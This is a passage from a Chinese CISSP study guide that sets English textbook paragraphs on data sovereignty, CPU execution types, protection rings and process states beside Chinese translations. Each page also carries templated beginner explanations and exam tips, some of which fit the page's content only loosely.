数据主权是指数字数据受其所在国或地区法律和法规管辖的概念。 它强调政府 对其管辖范围内收集的数据拥有管辖权,组织必须遵守当地的數據保護和隱私 法律。 数据主权与隐私、安全和合规性问题密切相关,通常会影响关于数据存 储、处理和管理地点的决策,以符合特定地理区域的法律和监管要求。 尽管数据本地化和数据主权是相关概念,但它们的关注点和影响不同: 关注点: 数据本地化:主要关注数据存储和处理的物理位置。 它要求某些类型 的数据,特别是敏感或个人信息,必须保留在特定的地理边界之内。 数据主权:涵盖了一个国家或地区对其管辖范围内生成的数据所主张 的权威和控制的更广泛原则。 这包括数据存储位置,以及对法律管辖 权和遵守当地数据保护法规的关切。 范围: 数据本地化:主要涉及数据存储和处理的地理方面。 它通常涉及规定数 据必须驻留在特定国家或地区边界内的物理服务器上的法规。 数据主权:涵盖更广泛的关注点,包括法律管辖权、监管合规性以 及政府对其境内收集的数据所拥有的最高权威。 它超越了单纯的数 据存储位置,延伸至控制和治理方面。 驱动因素: 数据本地化:通常由特定法规或法律驱动,这些法规或法律要求数据必须物理 存在于特定司法管辖区。

这可能出于数据隐私、安全或经济方面的考虑。

小白解释

场景先行:你是公司的安全负责人,正在读第 548 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 548 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 06 / PDF P549

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Data sovereignty: Driven by legal, political, and cultural considerations. Governments may enact data sovereignty regulations to protect the privacy of their citizens, ensure compliance with local laws, and assert control over data handling within their borders. Implications: Data localization: The primary implication is that organizations must establish data centers or use cloud services within the specified jurisdiction to comply with local regulations. This may impact the efficiency of cross-border data flow and increase operational costs.

Data sovereignty: Besides impacting data storage location, data sovereignty considerations may influence how organizations handle data governance, legal compliance, and interactions with third-party service providers. It can require a more comprehensive approach to data management and legal compliance. While data localization is a subset of data sovereignty, focusing specifically on where data is stored and processed, data sovereignty encompasses a broader set of principles related to data governance, jurisdiction, and legal compliance within a specific geopolitical boundary.

Both concepts, however, underscore the importance of aligning data practices with local regulations and legal frameworks. Data portability refers to the ability of individuals to easily and securely move their personal data from one system, service, or application to another. It allows users to transfer their data between different platforms, promoting user control and facilitating competition among service providers. Data portability empowers individuals by allowing them to choose services based on their preferences while maintaining access and control over their personal information.

This concept is often associated with data protection and privacy regulations emphasizing user rights and data control. Assess and Mitigate the Vulnerabilities of Security Architectures, Designs, and Solution Elements

中文直译 / 整理

数据主权:由法律、政治和文化因素驱动。 政府可能会制定数据主权 法规,以保护其公民的隐私、确保遵守当地法律,并对本国境内的数 据处理行使控制权。 影响: 数据本地化:主要影响是,组织必须在指定司法管辖区内建立数据中心 或使用云服务,以遵守当地法规。 这可能会影响跨境数据流动的效率, 并增加运营成本。 数据主权:除了影响数据存储位置外,数据主权的考虑还可能影响组 织如何处理数据治理、法律合规以及与第三方服务提供商的互动。 它 可能要求采取更全面的数据管理和法律合规方法。 虽然数据本地化是数据主权的一个子集,专注于数据存储和处理的具体位置, 但数据主权涵盖了与特定地缘政治边界内的数据治理、司法管辖和法律合规相 关的更广泛原则。 然而,这两个概念都强调了使数据实践与当地法规和法律框 架保持一致的重要性。 数据可移植性是指个人能够轻松且安全地将个人数据从一个系统、服 务或应用程序转移到另一个系统、服务或应用程序的能力。 它允许用户在 不同平台之间转移数据,促进用户控制并推动服务提供商之间的竞争。 数 据可移植性通过允许个人根据自身偏好选择服务,同时保持对个人信息的 访问和控制,从而增强个人的自主权。

这一概念通常与强调用户权利和数 据控制的数据保护和隐私法规相关联。 评估并缓解安全架构、设计和解决方案元素的脆弱性

小白解释

场景先行:你是公司的安全负责人,正在读第 549 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 07 / PDF P550

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Computer architecture is an engineering discipline concerned with designing and constructing computing systems at a logical level. Technical mechanisms that can be implemented via computer architecture are the controls that system designers can build into their systems. These include layering (see Chapter 1, “Security Governance Through Principles and Policies”), abstraction (see Chapter 1), data hiding (see Chapter 1), trusted recovery (see Chapter 18, “Disaster Recovery Planning”), process isolation (later in this chapter), and hardware segmentation (later in this chapter). The more complex a system, the less assurance it provides.

More complexity means more areas for vulnerabilities exist, and more areas must be secured against threats. More vulnerabilities and more threats mean that the subsequent security the system provides is less trustworthy. See Chapter 8 for more on “keep it simple.” Hardware The term hardware encompasses any tangible part of a computer that you can reach out and touch, from the keyboard and monitor to its CPU(s), storage media, and memory chips. Remember that although the physical portion of a storage device (such as a hard disk or flash memory) may be considered hardware, the contents of those devices—the collections of 0s and 1s that make up the software and data stored within them—may not.

Processor The central processing unit (CPU), generally called the processor or the microprocessor, is the computer's nerve center—it is the chip (or chips in a multiprocessor system) that governs all major operations and either directly performs or coordinates the complex symphony of calculations that allows a computer to perform its intended tasks. Surprisingly, the CPU can perform only a limited set of computational and logical operations, despite the complexity of the tasks it allows the overall computer system to perform. The operating system and compilers or interpreters are responsible for translating high-level programming languages into simple instructions that a CPU understands.

This limited range of functionality is intentional—it allows a CPU to perform computational and logical operations at blazing speeds.

中文直译 / 整理

计算机体系结构是一门工程学科,关注于在逻辑层面设计和构建计算系统。 通 过计算机体系结构可以实现的技术机制是系统设计者可以构建到其系统中的控 制机制。 这些机制包括分层(参见第1章,“通过原则和政策实现安全治理”)、 抽象(参见第1章)、数据隐藏(参见第1章)、可信恢复(参见第18章,“灾 难恢复规划”)、进程隔离(本章后面部分)和硬件分段(本章后面部分)。 系统越复杂,提供的保障就越少。 更多的复杂性意味着存在更多易 受攻击的区域,也需要保护更多区域免受威胁。 更多的漏洞和更多的威 胁意味着系统后续提供的安全性更不可信。 参见第8章了解更多关于 “保持简单”的内容。 Hardw are 术语hardware涵盖计算机中任何你可以触及的有形部件,从键盘和显示器到 其CPU、存储介质和内存芯片。 请记住,尽管存储设备的物理部分(如硬盘或 闪存)可被视为硬件,但这些设备的内容——构成其中存储的软件和数据的0和 1的集合——则不一定属于硬件。

Processor 中央处理器(CPU),通常称为处理器或微处理器,是计算机的神经中枢—— 它是(在多处理器系统中为多个)芯片,负责控制所有主要操作,并直接执行 或协调复杂的计算交响曲,使计算机能够完成其预期任务。 令人惊讶的是,尽 管CPU使整个计算机系统能够执行复杂的任务,但它只能执行有限的一组计算 和逻辑操作。 操作系统以及编译器或解释器负责将高级编程语言翻译成CPU能 够理解的简单指令。 这种有限的功能范围是刻意设计的——它使CPU能够以惊 人的速度执行计算和逻辑操作。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

分层:分层把控制按层排列,让攻击者必须连续突破。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

数据隐藏:数据隐藏减少不必要暴露,但不等于加密。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

对象、角色、组、接口都可能体现 abstraction。

隐藏是少暴露;加密是即使看到也读不懂。

ISO 偏标准和管理体系。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
分层 分层把控制按层排列,让攻击者必须连续突破。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
数据隐藏 数据隐藏减少不必要暴露,但不等于加密。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 08 / PDF P551

第 551 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Execution Types As computer processing power increased, users demanded more advanced features to enable these systems to process information at greater rates and to manage multiple functions simultaneously: At first blush, the terms multitasking, multicore, multiprocessing, multiprogramming, and multithreading may seem nearly identical. However, they describe very different ways of approaching the “doing two things at once” problem. We strongly advise you to review the distinctions between these terms until you feel comfortable with them. Multitasking In computing, multitasking means handling two or more tasks simultaneously.

In the past, most systems did not truly multitask because they relied on the OS to simulate multitasking by carefully structuring the sequence of commands sent to the CPU for execution (see multiprogramming). A single-core multitasking system is able to juggle more than one task or process at any given time. However, with that single-core CPU, it only executes a single process at any given moment. This is similar to juggling three balls, where your hands usually touch only one ball at any given instant, but the coordination of movements keeps all three balls moving. Multicore Today, most CPUs are multicore.

This means that the CPU is now a chip containing two, four, eight, dozens, or more independent execution cores that can operate simultaneously and/or independently. There are even some specialty chips with over 10,000 cores. Multiprocessing In a multiprocessing environment, a multiprocessor system harnesses the power of more than one processor to complete the execution of a multithreaded application. See the section “Large-Scale Parallel Data Systems,” later in this chapter.

中文直译 / 整理

执行类型 随着计算机处理能力的提升,用户要求更先进的功能,以使这些系统能够以 更高的速率处理信息并同时管理多个功能: 乍一看,多任务、多核、多处理、多道程序设计和多线程这些术语似 乎几乎相同。 然而,它们描述了截然不同的解决“同时做两件事”问题的 方法。 我们强烈建议您仔细区分这些术语,直到您对它们感到熟悉为止。 多任务 在计算中,多任务 指的是同时处理两个或更多任务。 在过去,大多 数系统并未真正实现多任务,因为它们依赖操作系统通过精心安排发送给 CPU执行的命令序列来模拟多任务(参见多道程序设计)。 单核多任务系统 能够在任意给定时刻同时处理多个任务或进程。 然而,在单核CPU上,它在 任意时刻仅执行一个进程。 这类似于抛接三个球,您的手在任意瞬间通常只 接触一个球,但通过协调动作使所有三个球持续运动。 多核 如今,大多数CPU都是多核的。 这意味着CPU现在是一个包含两个、 四个、八个、数十个或更多独立执行核心的芯片,这些核心可以同时和/或 独立运行。 甚至还有一些特殊芯片拥有超过10,000个核心。

多进程 在一个 multiprocessing 环境中,一个 多处理器系统利用多个处理器的力量来完成多线程应用程序的执行。 请参 见本章后面的“大规模并行数据系统”一节。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 551 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 09 / PDF P552

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Some multiprocessor systems may assign or dedicate a process or execution thread to a specific CPU (or core). This is called affinity. Multiprogramming Multiprogramming is similar to multitasking. It involves the pseudo-simultaneous execution of two tasks on a single processor coordinated by the OS as a way to increase operational efficiency. For the most part, multiprogramming is a way to batch or serialize multiple processes so that when one process stops to wait on a peripheral, its state is saved, and the next process in line begins to process.

The first program does not return to processing until all other processes in the batch have had their chance to execute, and they, in turn, stop for a peripheral. This methodology causes significant delays in completing a task for any single program. However, across all processes in the batch, the total time to complete all tasks is reduced. Multithreading Multithreading permits multiple concurrent tasks to be performed within a single process. Unlike multitasking, where multiple tasks consist of multiple processes, multithreading enables multiple tasks to operate within a single process.

A thread is a selfcontained sequence of instructions that can execute in parallel with other threads that are part of the same parent process. Multithreading is often used in applications where frequent context switching between multiple active processes causes excessive overhead and reduces efficiency; switching between threads incurs far less overhead and is, therefore, more efficient. Protection Mechanisms When a computer is running, it operates a runtime environment that represents the combination of the OS and whatever applications may be active.

Within that runtime environment, it's necessary to integrate security controls to protect the OS's integrity, manage which users are allowed to access specific data items, authorize or deny operations requested against such data, and so forth. How running computers implement and handle security at runtime may be broadly described as a collection of protection mechanisms, such as protection rings and operational states.

中文直译 / 整理

一些多处理器系统可能会将某个进程或执行线程分配或专用于特 定的 CPU(或核心)。 这称为亲和性。 多道程序设计 多道程序设计 与多任务处理相似。 它涉及在单个处理器上由 操作系统协调的两个任务的伪并行执行,以提高操作效率。 在大多数情况下, 多道程序设计是一种批处理或序列化多个进程的方法,以便当一个进程停止 以等待外围设备时,其状态会被保存,下一个进程开始执行。 第一个程序只 有在批处理中的所有其他进程都已轮到执行并因外围设备而停止后,才会重 新恢复处理。 这种机制会导致单个程序完成任务时出现显著延迟。 然而,对 于批处理中的所有进程而言,完成所有任务的总时间却减少了。 多线程 多线程 允许在单个进程中执行多个并发任务。 与多任务处理不同,多 任务处理涉及多个进程,而多线程则允许多个任务在单个进程中运行。 线程 是独立的指令序列,可以与属于同一父进程的其他线程并行执行。 多线程常 用于频繁在多个活动进程之间进行上下文切换导致开销过大、效率降低的应 用场景; 在线程之间切换的开销要小得多,因此更加高效。 保护机制 当计算机运行时,它会操作一个运行时环境,该环境代表操作系统与任何可 能正在运行的应用程序的组合。

在该运行时环境中,必须集成安全控制措施, 以保护操作系统的完整性,管理哪些用户被允许访问特定数据项,授权或拒 绝针对这些数据的操作请求等。 计算机在运行时如何实现和处理安全,可 broadly 描述为一系列保护机制,例如保护环和运行状态。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P553

第 553 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

PROTECTION RINGS From a security standpoint, protection rings organize code and components in an OS (as well as applications, utilities, or other code that runs under the OS's control) into concentric rings, as shown in Figure 9.1. The deeper inside the circle, the higher the privilege level associated with the code that occupies a specific ring. Though the original Multics implementation allowed up to seven rings (numbered 0 through 6), most modern OSs use a four-ring model (numbered 0 through 3).

中文直译 / 整理

保护环 从安全角度来看,保护环 将操作系统中的代码和组件(以及在操作系统控制下 运行的应用程序、工具或其他代码)组织成同心环,如 图 9.1 所示。 圆圈越靠 内,占据特定环的代码所关联的权限级别越高。 尽管最初的 Multics 实现最多 允许七个环(编号 0 到 6),但大多数现代操作系统采用四环模型(编号 0 到 3)。

小白解释

场景先行:你是公司的安全负责人,正在读第 553 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 553 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 11 / PDF P554

第 554 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

中文直译 / 整理

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

小白解释

场景先行:你是公司的安全负责人,正在读第 554 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 554 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 12 / PDF P555

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

FIGURE 9.1 The four-layer protection ring model As the innermost ring, 0 has the highest level of privilege and can basically access any resource, file, or memory location. The part of an OS that always remains resident in memory (so that it can run on demand at any time) is called the kernel. It occupies ring 0 and can preempt code running at any other ring. The remaining parts of the OS—those that come and go as various tasks are requested, operations are performed, processes are switched, and so forth—occupy ring 1.

Ring 2 is also somewhat privileged in that it's where I/O drivers and system utilities reside; these are able to access peripheral devices, special files, and so forth that applications and other programs cannot themselves access directly. Those applications and programs occupy the outermost ring, ring 3. The essence of the ring model lies in priority, privilege, and memory segmentation. Any process that wants to execute must get in line (a pending process queue). The process associated with the lowest ring number always runs before processes associated with higher-numbered rings.

Processes in lower-numbered rings can access more resources and interact with the OS more directly than those in higher-numbered rings. Those processes that run in higher-numbered rings must generally ask a handler or driver in a lowernumbered ring for services they need (aka system call), sometimes called a mediated-access model. In practice, many modern OSs use only two rings or divisions: one for system-level access (rings 0 through 2), often called kernel mode or privileged mode, and one for user-level programs and applications (ring 3), often called user mode. From a security standpoint, the ring model enables an OS to protect and insulate itself from users and applications.

It also permits the enforcement of strict boundaries between highly privileged OS components (such as the kernel) and less privileged parts of the OS (such as other parts of the OS, plus drivers and utilities). The ring that a process occupies determines its access level to system resources. Processes may access objects directly only if they reside within their own ring or within some outside ring. Before any such request can be honored, the called ring must check to make sure that the calling process has the proper credentials and authorization to access the data and to perform the operation(s) involved in satisfying the request.

中文直译 / 整理

图 9.1 四层保护环模型 作为最内层的环,0 拥有最高级别的权限,几乎可以访问任何资源、文件或内 存位置。 操作系统中始终驻留在内存中的部分(以便随时按需运行)称为 内核。 它占据环 0,能够抢占在其他任何环上运行的代码。 操作系统其余部分——这些 部分会随着各种任务的请求、操作的执行、进程的切换等而加载或卸载——占 据环 1。 环 2 也具有一定程度的特权,I/O 驱动程序和系统工具就位于此处; 它 们能够访问应用程序和其他程序无法直接访问的外围设备、特殊文件等。 这些 应用程序和程序占据最外层的环,即环 3。 环模型的本质在于优先级、权限和内存分段。 任何希望执行的进程都必须排队 (进入待处理进程队列)。 与最低环号相关联的进程总是优先于与较高环号相 关联的进程运行。 环号较低的进程能够访问更多资源,并比环号较高的进程更 直接地与操作系统交互。 运行在环号较高环中的进程通常必须向环号较低的环 中的处理程序或驱动程序请求所需的服务(即系统调用),这有时被称为 中介 访问模型。 在实践中,许多现代操作系统仅使用两个环或划分:一个用于系统 级访问(环 0 到环 2),通常称为 内核模式 或 特权模式;

另一个用于用户级 程序和应用程序(环 3),通常称为 用户模式。 从安全角度来看,环模型使操作系统能够保护并隔离自身免受用户和应用程序 的影响。 它还允许在高度特权的操作系统组件(如内核)与较低特权的操作系 统部分(如操作系统的其他部分、驱动程序和工具)之间强制执行严格的边界。 进程所处的环决定了其对系统资源的访问级别。 只有当进程位于其自身环内或 某个外部环内时,才能直接访问对象。 在任何此类请求被满足之前,被调用的 环必须检查调用进程是否具有访问数据并执行满足请求所需操作的适当凭证和 授权。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
学习单元 13 / PDF P556

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Rings Compared to Levels Many of the protecting ring concept's features also apply to a multilayer or multilevel system. The top of a layered or multilevel system is the same as the center ring (i.e., ring 0) of a protection ring scheme. Likewise, the bottom of a layered or multilevel system is the same as the outer ring of a protection ring scheme. Levels, layers, domains, and rings are similar in terms of protection and access concepts. PROCESS STATES Process states or operating states are various forms of execution in which a process may run.

Where the OS is concerned, it can be in one of two modes at any given moment: operating in a privileged, all-access mode known as supervisor state (aka Kernel mode) or operating in what's called the problem state associated with user mode, where privileges are low and all access requests must be checked against credentials for authorization before they are granted or denied. The latter is called the problem state not because problems are guaranteed to occur but because the unprivileged nature of user access means that problems can occur and the system must take appropriate measures to protect security, integrity, and confidentiality.

Processes line up for execution in an OS in a processing queue, where they will be scheduled to run as a processor becomes available. Most OSs allow processes to consume processor time only in fixed increments or chunks; if a process consumes its entire processing time (called a time slice) without completing, it returns to the processing queue for another time slice the next time its turn comes around. Also, the process scheduler usually selects the highest-priority process for execution, so reaching the front of the line doesn't always guarantee access to the CPU (because a process may be preempted at the last instant by another process with higher priority).

According to whether a process is running, it can operate in one of several states: Ready In the ready state, a process is ready to resume or begin processing as soon as it is scheduled for execution. If the CPU is available when the process reaches this state, it will transition directly into the running state; otherwise, it sits in the ready state until its turn comes up.

中文直译 / 整理

环与级别比较 保护环概念的许多特性也适用于多层或多级系统。 分层或多级系统的顶层与 保护环方案的中心环(即环 0)相同。 同样,分层或多级系统的底层与保护 环方案的外环相同。 级别、层、域和环在保护和访问概念上是相似的。 进程状态 进程状态或运行状态是进程可能运行的各种执行形式。 就操作系统而言,它在 任何时刻只能处于两种模式之一:一种是特权的、全访问模式,称为监督状态 (又称内核模式); 另一种是被称为问题状态的模式,与用户模式相关,在此 模式下权限较低,所有访问请求都必须在获得或拒绝之前根据凭据进行验证。 后者被称为问题状态,并非因为问题必然发生,而是因为用户访问的无特权性 质意味着问题可能发生,系统必须采取适当措施来保护安全、完整性和机密性。 进程在操作系统中以处理队列的形式排队等待执行,当处理器可用时,它们将 被调度运行。 大多数操作系统允许进程仅以固定的增量或块来消耗处理器时间; 如果一个进程在未完成的情况下耗尽了其全部处理时间(称为时间片),它将 返回处理队列,在下一次轮到它时再获得另一个时间片。

此外,进程调度程序 通常会选择优先级最高的进程进行执行,因此即使到达队列前端,也不一定能 保证访问CPU(因为一个进程可能在最后一刻被另一个优先级更高的进程抢占)。 根据进程是否运行,它可以处于以下几种状态之一: 就绪 在就绪状态下,进程已准备好在被调度执行时立即恢复或开始处理。 如 果进程进入此状态时CPU可用,它将直接转入运行状态; 否则,它将停留在 就绪状态,直到轮到它执行。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

